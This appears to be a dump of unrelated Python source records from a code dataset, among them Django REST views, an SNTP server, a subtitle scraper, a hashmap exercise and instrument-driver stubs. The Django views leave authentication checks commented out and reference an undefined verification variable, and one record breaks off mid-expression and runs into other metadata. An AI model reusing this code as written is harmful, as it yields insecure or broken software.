get_object(self,pk):#pk代表主键\n\t\ttry:\n\t\t\treturn Major.objects.get(pk=pk)\n\t\texcept Major.DoesNotExist:\n\t\t\traise Http404\n\n\tdef get(self,request,pk):\n\t\tmajor =self.get_object(pk)\n\t\tserializer = MajorSerializer(major)\n\t\treturn Response(serializer.data)\n\nclass CredentialList(APIView):\n\t#permission_classes = (permissions.IsAdminUser,)\n\tdef get_object(self):\n\t\tobj = get_object_or_404(self.get_queryset())\n\t\tself.check_object_permissions(self.request, obj)\n\t\treturn obj\n\tdef get(self,request):\n\t\tcredential = Credential.objects.all()\n\t\tserializer = CredentialSerializer(credential,many=True)\n\t\treturn Response(serializer.data)\n\tdef post(self,request):\n\t\t#if self.check_object_permissions():\n\t\t#self.check_object_permissions(request, obj)\n\t\t\t#print('what fuck')\n\t\tserializer =CredentialSerializer(data=request.data)\n\t\tif serializer.is_valid():#request.data和Response基于APIView和@api_view的\n\t\t\tserializer.save() #reques.data获取post,put等提交的数据\n\t\t\treturn Response(serializer.data,status=status.HTTP_201_CREATED)\n\t\treturn Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\t\t#else:\n\t\t#\treturn Response(errors)\ndef credential(request):\n\tif request.method == 'GET':\n\t\tcredential = Credential.objects.all()\n\t\tcre = []\n\t\tfor x in credential:\n\t\t\tcre.append(x.c_name)\n\n\t\treturn HttpResponse(json.dumps(cre))\ndef major(request):\n\tif request.method == 'GET':\n\t\tcredential = Major.objects.all()\n\t\tcre = []\n\t\tfor x in credential:\n\t\t\tcre.append(x.m_name)\n\n\t\treturn HttpResponse(json.dumps(cre))\n\n\nclass CredentialDetail(APIView):\n\tdef get_object(self,pk):\n\t\ttry:\n\t\t\treturn Credential.objects.get(pk=pk)\n\t\texcept Credential.DoesNotExist:\n\t\t\traise Http404\n\tdef get(self,request,pk):\n\t\t#permission_classes = (permissions.IsAdminUser,)\n\t\tc = self.get_object(pk)\n\t\t#name = request.GET['name']\n\t\t#c = Credential.objects.get(c_name=name)\n\t\tserializer = CredentialSerializer(c)\n\t\treturn Response(serializer.data)\n\nclass MajorSelect(APIView):\n\tdef 
get(self,request):\n\t\tname = request.query_params['name']#这个获取url参数,和request.GET['']功能一样\n\t\ttry:\t\t\t\t\t\t\t\t\n\t\t\tm = Major.objects.get(m_name=name)\n\t\t\tmajor = MajorSerializer(m)\n\t\t\treturn Response(major.data)\n\t\texcept:\n\t\t\traise Http404\nclass CredentialSelect(APIView):\n\tdef get(self,request):\n\t\tname = request.query_params['name']\n\t\tprint(name,90)\n\t\ttry:\n\t\t\tm = Credential.objects.get(c_name=name)\n\t\t\tcredential = CredentialSerializer(m)\n\t\t\treturn Response(credential.data)\n\t\texcept:\n\t\t\traise Http404\n\nclass Update_profile(APIView):\n\tdef put(self,request):\n\t\tdata = request.data\n\t\tuser = User.objects.get(pk=data['id'])\n\t\tuser = UseUserprofileSerializer(user,data=request.data)\n\t\tuser.save()\n\n\t\t\nclass UserDetail(APIView):\n\tdef get(self,request):\n\t\ti = request.query_params['id']\n\t\tusers = User.objects.get(pk=i)#.select_related('user')\n\t\tserializer = UserprofileSerializer(users)\n\t\treturn Response(serializer.data)\n\tdef put(self,request):\n\t\tdata = request.data\n\t\tuser = User.objects.get(pk=data['id'])\n\t\tusers = UserprofileSerializer(user,data=request.data)\n\t\tif users.is_valid():\n\t\t\tusers.save()\n\t\t\treturn Response(users.data)\n\t\treturn Response(users.errors,status=status.HTTP_400_BAD_REQUEST)\n\n\n\ndef send_register_email(request):\n email_record=EmailVerityRecord()\n email=request.GET[\"email\"]\n email_record.email=email\n email_title = '邮件标题'\n random_s = random.randint(100000,999999)\n a = str(random_s)\n email_record.code=a\n email_record.save()\n email_body = '关于我公司的验证码:%s 你好,我是王磊,我在用Python给你发邮箱,哈哈哈哈哈'%(a)\n email = email # 对方的邮箱\n send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])\n\n if send_status:\n return HttpResponse(\"ok\")\n\n # return HttpResponse(\"SJFSKD\")\n\ndef yanzhengqq(request):\n if request.method=='GET':\n #b=EmailVerityRecord.objects.all()\n email = request.GET[\"email\"]\n try:\n b=EmailVerityRecord.objects.get(email=email)\n except:\n return HttpResponse(json.dumps({\"email\": \"false\"}))\n\n if b.code == yanzhengma: #tanzhengma in b:\n return HttpResponse(json.dumps({\"message\":\"ok\"}))\n else:\n return HttpResponse(json.dumps({\"message\":\"false\"}))\n","sub_path":"dc_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
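These class-based views only become reachable once they are routed. A hypothetical `urls.py` sketch is below; the URL paths and the query parameters noted in comments are assumptions, only the view names come from the module itself.

```python
# Hypothetical dc_app/urls.py sketch wiring the views above; the paths are
# assumptions, only the view names come from the module.
from django.urls import path
from dc_app import views

urlpatterns = [
    path("majors/", views.MajorList.as_view()),
    path("majors/<int:pk>/", views.MajorDetail.as_view()),
    path("majors/select/", views.MajorSelect.as_view()),           # ?name=<m_name>
    path("credentials/", views.CredentialList.as_view()),
    path("credentials/<int:pk>/", views.CredentialDetail.as_view()),
    path("credentials/select/", views.CredentialSelect.as_view()), # ?name=<c_name>
    path("users/", views.UserDetail.as_view()),                    # ?id=<pk>
    path("email/send/", views.send_register_email),                # ?email=<addr>
    path("email/verify/", views.yanzhengqq),     # ?email=<addr>&yanzhengma=<code>
]
```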
+{"seq_id":"215893943","text":"#!/usr/bin/python3\n\nimport sys\nimport os\nimport logging\nimport socket\nimport time\nimport datetime\nimport struct\nfrom argparse import ArgumentParser\nfrom concurrent.futures import ThreadPoolExecutor\n\n\n_system_epoch = datetime.date(*time.gmtime(0)[0:3])\n_sntp_epoch = datetime.date(1900, 1, 1)\nTIME_SINCE_1900 = (_system_epoch - _sntp_epoch).days * 24 * 3600\n\nMAX_WORKERS = 3\n\nclass ServerSNTP(ThreadPoolExecutor):\n\n HOST = '0.0.0.0'\n PORT = 8000\n PKT_FORMAT = \"!BBBbII4sQQQQ\" # Struct format\n\n def __init__(self, offset):\n ThreadPoolExecutor.__init__(self, max_workers=MAX_WORKERS)\n self._offset = offset\n self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,\n socket.getprotobyname(\"UDP\"))\n logging.debug(\"Server initialized\")\n\n def start(self):\n self._sock.bind((ServerSNTP.HOST, ServerSNTP.PORT))\n while True:\n query_data, dest = self._sock.recvfrom(1024)\n logging.info(\"Query received\")\n answer = self.create_answer(query_data)\n self.submit(self._send_answer, answer, dest)\n\n def create_answer(self, query_data):\n current_time = self.time\n try:\n data = struct.unpack(ServerSNTP.PKT_FORMAT, query_data)\n LI_VN_MODE = 0b11100100 # Leap Indicator: alarm condition, Version Number: 4, Mode: server\n stratum = 2\n poll, precision, root_delay, root_dispersion = 4, 0, 0, 0\n reference_identifier = b\"LOCL\"\n reference_timestamp = 0\n originate_timestamp = data[10]\n receive_timestamp = current_time\n transmit_timestamp = self.time\n answer = struct.pack(ServerSNTP.PKT_FORMAT,\n LI_VN_MODE, stratum, poll, precision,\n root_delay,\n root_dispersion,\n reference_identifier,\n reference_timestamp,\n originate_timestamp,\n receive_timestamp,\n transmit_timestamp)\n return answer\n except struct.error:\n logging.info(\"Bad packet received\")\n return b''\n\n def _send_answer(self, data, dest):\n self._sock.sendto(data, dest)\n\n @property\n def time(self):\n return int(time.time() + TIME_SINCE_1900 + self._offset) * 2**32\n\n def shutdown(self, wait=True):\n logging.debug(\"Shutting down\")\n self._sock.close()\n ThreadPoolExecutor.shutdown(self, wait)\n\n\ndef parse_args(args):\n parser = ArgumentParser(description=\"Sntp server\")\n parser.add_argument(\"-l\", \"--log-level\", action='store', dest=\"log_lvl\",\n default=\"CRITICAL\",\n help=\"Logging level. Should be one of: CRITICAL,\"\n \"ERROR, WARNING, INFO, DEBUG.\")\n # if len(args) == 0:\n # print(\"Arguments not found\")\n # parser.print_help()\n # return None\n return parser.parse_args(args)\n\n\ndef main():\n args = parse_args(sys.argv[1:])\n if args is None:\n sys.exit(1)\n logging.basicConfig(level=args.log_lvl)\n server = None\n config_file = \"config.cfg\"\n if config_file not in os.listdir():\n print(f\"{config_file} doesn't exists\")\n sys.exit(1)\n with open(config_file, mode='r') as f:\n offset = int(f.readline().rstrip(\"\\n\"))\n try:\n server = ServerSNTP(offset)\n server.start()\n except KeyboardInterrupt:\n logging.warning(\"Interupted\")\n sys.exit(0)\n except Exception as e:\n logging.exception(e)\n sys.exit(2)\n finally:\n if server:\n server.shutdown()\n\n\nif __name__==\"__main__\":\n main()\n","sub_path":"tasks/sntp-serever/sntp_server.py","file_name":"sntp_server.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"128530101","text":"import numpy as np\r\nimport csv\r\nimport yaml\r\n\r\n\r\n\r\nclass Operation4:\r\n def __init__(self):\r\n self.num_question = 10 # the number of question\r\n self.num_digit = 1 # the number of digit\r\n self.isNegative = False # negative value question is OK?\r\n self.isDecimal = False # decimal question is OK?\r\n\r\n\r\n def pre_calc(self, admd):\r\n if self.isNegative == True:\r\n lim_l = -1 * 10**(self.num_digit)+1\r\n lim_h = 10**(self.num_digit)-1\r\n else:\r\n lim_l = 10**(self.num_digit-1)\r\n lim_h = 10**(self.num_digit)-1\r\n\r\n if self.isDecimal == True:\r\n np.set_printoptions(precision=2)\r\n arr = (lim_h - lim_l) * np.random.rand(self.num_question, 2) + lim_h\r\n else:\r\n arr = np.random.randint(lim_l, lim_h, (self.num_question, 2))\r\n\r\n if self.isNegative == False and admd is 'diff': # if diff ans is negative\r\n # diff_positive = np.where(arr[:, 0] >= arr[:, 1])\r\n diff_negative = np.where(arr[:, 0] < arr[:, 1])\r\n\r\n for i in diff_negative[0]:\r\n arr_index = arr[i]\r\n arr[i] = arr_index[1], arr_index[0]\r\n\r\n return arr\r\n\r\n\r\n def calc_ope4(self, admd):\r\n calc_formula = self.pre_calc(admd)\r\n\r\n if admd == 'add':\r\n calc_result = np.array([np.sum(calc_formula, axis=1)]).T\r\n calc_info = 'add'\r\n calc_symbol = '+'\r\n \r\n elif admd == 'diff':\r\n calc_result = np.array(np.diff(calc_formula, axis=1) * (-1))\r\n calc_info = 'diff'\r\n calc_symbol = '-'\r\n\r\n elif admd == 'multiply':\r\n calc_result = np.array([calc_formula[:,0] * calc_formula[:,1]]).T\r\n calc_info = 'multiply'\r\n calc_symbol = '*'\r\n\r\n elif admd == 'div':\r\n calc_result = np.array([calc_formula[:,0] / calc_formula[:,1]]).T\r\n calc_info = 'div'\r\n calc_symbol = '/'\r\n \r\n else:\r\n return 'ERROR', 'CHECK ARGUMENT'\r\n\r\n # reshape \r\n output_formula = np.array([calc_formula[:, 0], np.repeat(calc_symbol, self.num_question), calc_formula[:, 1], np.repeat('=', self.num_question)], dtype='str').T\r\n output_calc = np.concatenate([output_formula, calc_result], axis=1)\r\n return calc_info, output_calc\r\n\r\n\r\n\r\ndef export_tsv(read_data):\r\n f_name = 'export_tsv'\r\n with open(f_name, mode='w', encoding='utf-8') as fo:\r\n tsv_writer = csv.writer(fo, delimiter='\\t')\r\n tsv_writer.writerows(read_data)\r\n\r\n\r\ndef export_yaml():\r\n f_name = 'export_yaml'\r\n\r\n\r\ndef main():\r\n operation4class = Operation4()\r\n calc_info, output_calc = operation4class.calc_ope4('div')\r\n print(calc_info,'\\n', output_calc)\r\n export_tsv(output_calc)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"172918598","text":"class Node:\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n @staticmethod\n def serialize(node):\n if node is None:\n return \"None\"\n return node.val + \"-\" + Node.serialize(node.left) + \"-\" + Node.serialize(node.right)\n\n @staticmethod\n def deserialize(s=None, vals=None):\n if s is None and vals is None:\n raise Exception(\"Both parameters are None.\")\n if vals is None and s:\n vals = s.split('-') # convert serialize string to array\n val = vals.pop(0) # get and remove the first index\n\n if val == \"None\":\n return None\n\n node = Node(val)\n node.left = Node.deserialize(vals=vals)\n node.right = Node.deserialize(vals=vals)\n\n return node\n \nif __name__ == \"__main__\":\n node = Node('root', Node('left', Node('left.left')), Node('right'))\n assert Node.deserialize(Node.serialize(node)).left.left.val == \"left.left\", \"TEST FAILED\"\n print(\"TEST PASSED\")\n ","sub_path":"2019.03.16/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"413595798","text":"import numpy as np\nfrom toolz.curried import curry, pipe\n\ntry:\n import edt\n transform_edt = curry(edt.edt)(black_border=False)\nexcept ImportError:\n import scipy.ndimage.morphology as morph\n transform_edt = morph.distance_transform_edt\n print(\"you can install edt for speed-up as - \")\n print(\"pip install edt\")\n pass\n\ntry:\n import torch\n torch_rfft = curry(torch.rfft) # pylint: disable=invalid-name\n torch_irfft = curry(torch.irfft) # pylint: disable=invalid-name\n\n def conjugate(x):\n \"\"\"\n returns the conjugate of a complex torch tensor\n \"\"\"\n y = torch.empty_like(x)\n y[..., 1] = x[..., 1] * -1\n y[..., 0] = x[... , 0]\n return y\n\n @curry\n def mult(x1, x2):\n \"\"\"\n returns the product of complext torch tensors x1 and x2\n \"\"\"\n y = torch.empty_like(x1)\n y[..., 0] = x1[..., 0]*x2[..., 0] - x1[..., 1]*x2[..., 1]\n y[..., 1] = x1[..., 0]*x2[..., 1] + x1[..., 1]*x2[..., 0]\n return y\n\n @curry\n def imfilter(f_data1, f_data2):\n \"\"\"\n For convolving f_data1 with f_data2 using PyTorch\n \"\"\"\n ndim = f_data1.ndim\n f_data1 = torch.from_numpy(f_data1).double()\n f_data2 = torch.from_numpy(f_data2).double()\n\n rfft = torch_rfft(signal_ndim=ndim)\n irfft = torch_irfft(signal_ndim=ndim)\n\n return pipe(f_data1,\n rfft,\n lambda x: mult(x, conjugate(rfft(f_data2))),\n irfft,\n lambda x: np.fft.fftshift(x))\nexcept ImportError:\n @curry\n def imfilter(x_data, f_data):\n \"\"\"\n to convolve f_data over x_data\n \"\"\"\n return pipe(f_data,\n lambda x: np.fft.ifftshift(x),\n lambda x: np.fft.fftn(x),\n lambda x: np.conj(x) * np.fft.fftn(x_data),\n lambda x: np.fft.ifftn(x),\n lambda x: np.absolute(x))\n print(\"you can install torch for speed-up as - \")\n print(\"conda install pytorch-cpu torchvision-cpu -c pytorch\")\n pass\n\n\ndef sphere(r=10):\n \"\"\"\n args: radius of the sphere\n\n returns: A 3D cubic matric of dim (2*r+1)^1\n \"\"\"\n return pipe(2*r+1,\n lambda x: np.mgrid[:x,:x,:x],\n lambda xx: (xx[0]-r)**2 + (xx[1]-r)**2+(xx[2]-r)**2,\n lambda x: (x-fix.py","file_name":"d30554bc90f36d7f7835bd21fe5c5b86169b5432--fix.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"524707407","text":"import datetime\nfrom django.core.management.base import BaseCommand\nfrom lib import genehasher\nfrom lib.fileUtils import downloadFromUrl, gunzip\nimport subprocess\nimport os\nfrom network.models import Cdd\nfrom django.db import connection\n\nimport pickle\nfrom lib import genehasher as gh\n\nimport pprint\npp = pprint.PrettyPrinter(indent=4, compact=True, depth=2)\n\npath = 'data/protein/'\npath2 = 'data/pickles/'\nfiles = [ 'ftp://ftp.ncbi.nih.gov/pub/mmdb/cdd/family_superfamily_links',\n 'ftp://ftp.ncbi.nih.gov/pub/mmdb/cdd/cddid.tbl.gz',\n path+'family_superfamily_links.txt',\n path+'cddid.tbl.gz',\n path+'cddid.txt',\n path+'cdd_latest',\n path2+'cdd_latest'\n]\n\nclass Command(BaseCommand):\n args = ''\n help = 'our help string comes here'\n\n def _download_from_ncbi_cdd( self ):\n\n downloadFromUrl( files[0], files[2] )\n downloadFromUrl( files[1], files[3] )\n gunzip( files[3], path, files[4] )\n\n def _load_dbtable( self ):\n\n # load data into entrez table\n Cdd.objects.all().delete()\n with connection.cursor() as c:\n c.execute( 'LOAD DATA LOCAL INFILE %s REPLACE INTO TABLE tcga.cdd FIELDS TERMINATED BY \"\\t\" ignore 1 lines' + \n ' (PSSM, ACC, NAME, DESCRIPTION, ROOT, SUB, SUPER)', [ files[5] ] )\n\n Cdd.objects.filter( super = 0 ).update(super = None) \n \n def _parse_file( self ):\n\n cdd = dict()\n with open( files[2] ) as cddTree:\n with open( files[4] ) as cddAttr:\n cdd = gh.createCDDtree( cddTree, cddAttr, False )\n\n #pp.pprint(cdd['ByPssm']) \n pickle.dump( cdd, open( files[6], 'wb' ))\n fout = open( files[5], 'wt' )\n fout.write( '\\t'.join([ 'Pssm', 'Acc', 'Name', 'Desc', 'Root', 'Sub', 'Super' ]) + \"\\n\" )\n for d in list( cdd['ByPssm'].values()) :\n sub = ''\n if type( d['Sub']) is list:\n# print( 'yes, sub is a list' )\n sub = ';'.join( [ d['Sub'][i]['Pssm'] for i in range(len(d['Sub'])) ] )\n\n# print( type(d['Sub']) )\n sup = '' #d['Root']['Pssm']\n if isinstance( d['Super'], dict ):\n# print('yes, super is a dict')\n sup = d['Super']['Pssm']\n\n fout.write( '\\t'.join([ d['Pssm'], d['Acc'], d['Name'], d['Desc'],\n d['Root']['Pssm'], sub, sup ]) + \"\\n\")\n# print( type(d['Super']) )\n# print( d['Desc'])\n fout.close()\n\n \n def handle(self, *args, **options):\n print( '\\n\\n\\n\\n############################ ' + 'update CDD data on ' + str(datetime.date.today()))\n self._download_from_ncbi_cdd()\n self._parse_file()\n self._load_dbtable()\n","sub_path":"management/commands/load_cdd_data.py","file_name":"load_cdd_data.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"608708176","text":"import chardet\nimport os.path\nimport glob\nimport sys\nimport re\n\ndef readdir(path, confidence=0.6):\n '''path : Specific Directory Path and Filename Extension.\n confidence[0.0-1.0] : Specific the detect encode confidence.\n File will be ignore if below this value.\n '''\n title = []\n documents = []\n unknown = 0\n for file in glob.glob(path):\n with open(file, 'rb') as f:\n text = f.read()\n encode = chardet.detect(text)\n if (encode['confidence'] < confidence):\n if(unknown == 0):\n print('Unknown encode file :')\n unknown += 1\n print(file)\n else:\n title.append(os.path.splitext(os.path.basename(file))[0])\n documents.append(text.decode(encode['encoding']))\n print()\n if(unknown > 0):\n print('Number of unknown encoding files :', unknown)\n print('Number of read files :', len(documents))\n print('Number of files :', len(glob.glob(path)))\n return title, documents\n\n\ndef savetofile(path, data, confidence=0.6, default_encode = 'utf-8'):\n '''path : save data to file, specific file_path file_name, and file_extension.\n data : input data to save.\n confidence: detect encode confidence throttle\n default_encode: use default_encode if confidence lower than throttle\n '''\n if os.path.isfile(path):\n with open(path, 'rb') as f:\n text = f.read()\n encode = chardet.detect(text)\n if (encode['confidence'] < confidence):\n print('Unknown encode file! Use default encode: ', default_encode)\n original = list(map(str.strip, open(path, 'r+', encoding=default_encode).readlines()))\n else:\n original = list(map(str.strip, open(path, 'r+', encoding=encode['encoding']).readlines()))\n else:\n original = []\n original = sorted(original)\n with open(path, 'a+') as f:\n for i in range(len(data)):\n text = data[i]\n for i in text:\n if i not in original:\n f.write(i + '\\n')\n return\n \n","sub_path":"finaceKAM/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"157829455","text":"#!/usr/bin/env python\nimport re\nimport requests\nimport bs4\nimport os\nimport utils\n\n\ndef getSubsPage(showTitle, season):\n \"\"\"\n Gets the link of the available subtitles of the show.\n :param showTitle: Name of the show\n :param season: Season number {S\\d\\d}\n :returns: addic7ed.com link for the specified season of the show\n \"\"\"\n title_readable = showTitle.replace('_', ' ');\n season_target = int(filter(str.isdigit, season))\n\n with requests.session() as c:\n response = c.get('http://www.addic7ed.com/')\n soup = bs4.BeautifulSoup(response.text, 'html.parser')\n for element in soup.find_all('option'):\n if re.compile(title_readable, flags=re.IGNORECASE).match(element.string):\n show_id = element.get('value')\n main_page = 'http://www.addic7ed.com/ajax_loadShow.php?show={0}&season={1}&langs=|1|&hd=1&hi=undefined'.format(show_id, season_target)\n utils.printDebug(main_page)\n return main_page\n else:\n print('Show with title \\'{0}\\' could not be found in addic7ed.com'.format(title_readable))\n\ndef getAvailableReleases(showTitle, season, episode):\n \"\"\"\n Returns the available releases for the specified episode of the show.\n :param showTitle: Name of the show\n :param season: Season number {S\\d\\d}\n :param episode: Episode number {E\\d\\d}\n :returns: list of available releases for the passed episode of the show\n \"\"\"\n season_target = int(filter(str.isdigit, season))\n episode_target = int(filter(str.isdigit, episode))\n\n releases = set()\n main_page = getSubsPage(showTitle, season)\n if main_page:\n with requests.session() as c:\n response = c.get(main_page)\n soup = bs4.BeautifulSoup(response.text, 'html.parser')\n for element in soup.find_all('tr', attrs={'class':'epeven completed'}):\n attributes = element.find_all('td')\n season_fetched = int(attributes[0].text)\n if season_fetched == season_target:\n episode_fetched = int(attributes[1].text)\n if episode_fetched == episode_target:\n releases.add(attributes[4].text)\n\n utils.printDebug(str(list(releases)))\n return releases\n\n\ndef getSubtitle(showTitle, season, episode, release):\n \"\"\"\n Downloads subtitle in English language for the specified episode of the show for the given release.\n :param showTitle: Name of the show\n :param season: Season number {S\\d\\d}\n :param episode: Episode number {E\\d\\d}\n :param release: name of the release\n \"\"\"\n # TODO return value?\n title_readable = showTitle.replace('_', ' ');\n season_target = int(filter(str.isdigit, season))\n episode_target = int(filter(str.isdigit, episode))\n\n main_page = getSubsPage(showTitle, season)\n if main_page:\n with requests.session() as c:\n response = c.get(main_page)\n\n soup = bs4.BeautifulSoup(response.text, 'html.parser')\n for element in soup.find_all('tr', attrs={'class':'epeven completed'}):\n attributes = element.find_all('td')\n season_fetched = int(attributes[0].text)\n if season_fetched == season_target:\n episode_fetched = int(attributes[1].text)\n if episode_fetched == episode_target:\n if re.compile(release, flags=re.IGNORECASE).match(attributes[4].text):\n link_id = attributes[9].find('a').get('href')\n utils.printDebug('Subtitle download link: http://www.addic7ed.com' + link_id)\n\n subtitle = c.get('http://www.addic7ed.com' + link_id, headers={'referer': main_page})\n\n download_path, filename = utils.searchMediaDownloadPath([title_readable, season, episode, release])\n\n if download_path == '':\n utils.printDebug('Subtitle is being saved to the default Download path.')\n 
download_path = os.path.expanduser('~/Downloads')\n\n if filename == '':\n filenames = re.findall(\"filename=(.+)\", subtitle.headers['content-disposition'])\n filename = filenames[0].replace('\"', '')\n # Replace the extension with '.srt'\n filename = os.path.splitext(filename)[0] + '.srt'\n\n with open(os.path.join(download_path, filename), 'wb') as code:\n code.write(subtitle.content)\n\n print('Subtitle is downloaded succesfully.\\n(' + os.path.join(download_path, filename) + ')')\n break\n else:\n print('Subtitle could not be downloaded')\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"showTitle\", help=\"Name of the show {separated by underscores}\")\n parser.add_argument(\"season\", help=\"Season number {S\\d\\d}\")\n parser.add_argument(\"episode\", help=\"Episode number {E\\d\\d}\")\n parser.add_argument(\"release\", help=\"Name of the release\")\n parser.add_argument(\"-v\", \"--verbose\", help=\"Increase output verbosity\", action=\"store_true\")\n args = parser.parse_args()\n\n utils.verbose = args.verbose\n getSubtitle(args.showTitle, args.season, args.episode, args.release)\n","sub_path":"src/subtitledownloader.py","file_name":"subtitledownloader.py","file_ext":"py","file_size_in_byte":5521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
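Besides the CLI entry point, the functions can be driven programmatically. A hypothetical sketch follows; the show, season, episode, and release names are examples only, and since the module's `int(filter(...))` idioms are Python 2-isms, this runs under Python 2 as written.

```python
# Hypothetical programmatic usage, mirroring the CLI entry point; the show
# and release values below are examples. Python 2 is assumed by the module.
import utils
from subtitledownloader import getAvailableReleases, getSubtitle

utils.verbose = True
releases = getAvailableReleases("the_expanse", "S01", "E01")
print(releases)
if releases:
    getSubtitle("the_expanse", "S01", "E01", sorted(releases)[0])
```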
+{"seq_id":"587909366","text":"# https://leetcode.com/problems/design-hashmap/\n\n# Design a HashMap without using any built-in hash table libraries.\n\n# Implement the MyHashMap class:\n# MyHashMap() initializes the object with an empty map.\n# void put(int key, int value) inserts a (key, value) pair into the HashMap. If the key already exists in the map, update the corresponding value.\n# int get(int key) returns the value to which the specified key is mapped, or -1 if this map contains no mapping for the key.\n# void remove(key) removes the key and its corresponding value if the map contains the mapping for the key.\n\nimport collections\n\n\nclass ListNode:\n def __init__(self, key=None, value=None, next=None):\n self.key = key\n self.value = value\n self.next = next\n\n\nclass MyHashMap:\n\n def __init__(self):\n self._hashsize = 1009\n self.hash_table = collections.defaultdict(ListNode)\n\n def put(self, key: int, value: int) -> None:\n prev_node, hash_node = self._get_node(key)\n\n # if the key doesn't exist\n if prev_node is None:\n self.hash_table[self._hash(key)] = ListNode(key, value)\n return\n\n # if the key already exists\n if hash_node:\n hash_node.value = value\n return\n\n prev_node.next = ListNode(key, value)\n\n def get(self, key: int) -> int:\n\n prev_node, hash_node = self._get_node(key)\n\n # if there's no mapping for the key\n if hash_node is None:\n return -1\n else:\n return hash_node.value\n\n def remove(self, key: int) -> None:\n hash_index = self._hash(key)\n prev_node, hash_node = self._get_node(key)\n if hash_node is None:\n return\n\n if prev_node == hash_node:\n if hash_node.next is None:\n self.hash_table[hash_index] = ListNode()\n else:\n self.hash_table[hash_index] = hash_node.next\n return\n\n prev_node.next = hash_node.next\n del hash_node\n\n def _get_node(self, key: int) -> tuple:\n prev_node = hash_node = self.hash_table[self._hash(key)]\n\n # if there's no mapping for the key\n if hash_node.value is None:\n return None, None\n\n # if there's mapping for the key\n while hash_node:\n if hash_node.key == key:\n return prev_node, hash_node\n prev_node, hash_node = hash_node, hash_node.next\n\n return prev_node, hash_node\n\n def _hash(self, key: int) -> int:\n # hash function\n hashval = key % self._hashsize\n return hashval\n\n\n# test case\nobj = MyHashMap()\nobj.put(2, 1)\nprint(obj.get(2))\nobj.put(10002, 2)\nprint(obj.get(2))\nobj.remove(10002)\nprint(obj.get(2))\nprint(obj.get(10002))\n","sub_path":"LeetCode/6. 해시 테이블/706-design-hashmap.py","file_name":"706-design-hashmap.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"606082478","text":"#!/usr/bin/env python\nimport importlib\nimport logging\nfrom math import acos, atan2, copysign, cos, sin, sqrt\nfrom multiprocessing import RLock\nfrom threading import Event, Thread\nfrom time import sleep\nfrom typing import Dict, List, Tuple\n\nimport InstrumentDriver\nimport numpy as np\nfrom scipy import constants as cs\n\nlogger = logging.getLogger(__name__)\n# handler = logging.FileHandler(\n# r\"C:\\Users\\Shabani_Lab\\Documents\\MagnetDebug\\log.txt\", mode=\"w\"\n# )\n# handler.setLevel(logging.DEBUG)\n# logger.addHandler(handler)\n# logger.critical(\"Test handler\")\n\n\nclass BiasGenerator:\n \"\"\"Bias current generator for VICurveTracer.\"\"\"\n\n def __init__(self, address):\n raise NotImplementedError\n\n def close(self):\n raise NotImplementedError\n\n def select_range(self, voltage, load_resistance):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def current_value(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def goto_value(self, value, slope):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def prepare_ramps(self, ramps: List[Tuple[float, float, float]]):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def start_ramp(self, index):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def is_ramping(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def get_admissible_reset_rate(self, reset_rate, amplitude):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def get_sweep_resolution(self) -> Dict[str, float]:\n \"\"\" \"\"\"\n raise NotImplementedError\n\n def support_continuous_sweeping(self) -> bool:\n \"\"\"\"\"\"\n raise NotImplementedError\n\n\nclass VoltMeter:\n \"\"\"Voltmeter for VICurveTracer.\"\"\"\n\n def __init__(self, address):\n raise NotImplementedError\n\n def close(self):\n raise NotImplementedError\n\n def list_ranges(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def get_range(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def set_range(self, value):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n # Continuous or point by point\n def set_acquisition_mode(self, value):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def get_averaging_time(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def set_averaging_time(self, value):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def list_acquisition_rates(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def get_acquisition_rate(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def set_acquisition_rate(self, value):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def prepare_acquistion(self, points):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def arm_device(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def wait_for_data_ready(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def retrieve_data(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def read_value(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n\nclass LockIn:\n \"\"\"\"\"\"\n\n def __init__(self, address):\n raise 